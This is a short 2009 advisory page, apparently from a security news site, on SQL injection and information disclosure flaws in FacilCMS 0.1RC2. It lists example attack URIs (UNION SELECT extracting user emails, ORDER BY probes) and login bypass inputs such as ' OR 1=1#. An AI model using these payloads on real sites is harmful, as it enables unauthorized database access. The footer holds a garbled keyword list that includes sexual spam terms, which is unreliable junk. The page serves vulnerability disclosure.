about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , FacilCMS Multiple SQL Injection And Information Disclosure Vulnerabilities


Title FacilCMS Multiple SQL Injection And Information Disclosure Vulnerabilities
Published 2009-03-18-12:00AM
Updated 2009-03-19-05:36PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  any.zicky
Vulnerable  FacilCMS FacilCMS 0.1RC2
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs are available:http://www.example.com/phpinfo.php
http://www.example.com/facil-cms/modules.php?modload=News&op=view&id=1+AND+1=1#
http://www.example.com/facil-cms/modules.php?modload=Pages&op=view&id=1+ORDER+BY+5/*
http://www.example.com/facil-cms/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,email+FROM+facil_users+LIMIT+1,2/* The following input examples are available:http://www.example.com/index.php?modload=User Email: admin@facilcms.org'#
pass: blaaaaa Email: ' OR 1=1#
pass: blaaaaa
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 09:00:09 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Wwwyhoo.co Actors sex karhg t29t 200 /compo IMMEG TornCity kaht3 playboyc mambo Remo pahlavi exploit ft teen porn zboard.htm mature mum 200 /compo ip board 2 Bf vidos CO TA HOLK www.gzfash eXoops WWW.SEXC aspupload news for c news for c mass.pl www.47914. Sex imege Hot sexey 404 news for c 200 /.blac faoto gerl 15 yoshli. SERVER U F free bangl www.jujiam 200 /compo ipb hack Crack Data port list huhaojie.t www.dnfhao Ninethara news for c 200 / /-- literotica news for c /search/ex xp bypass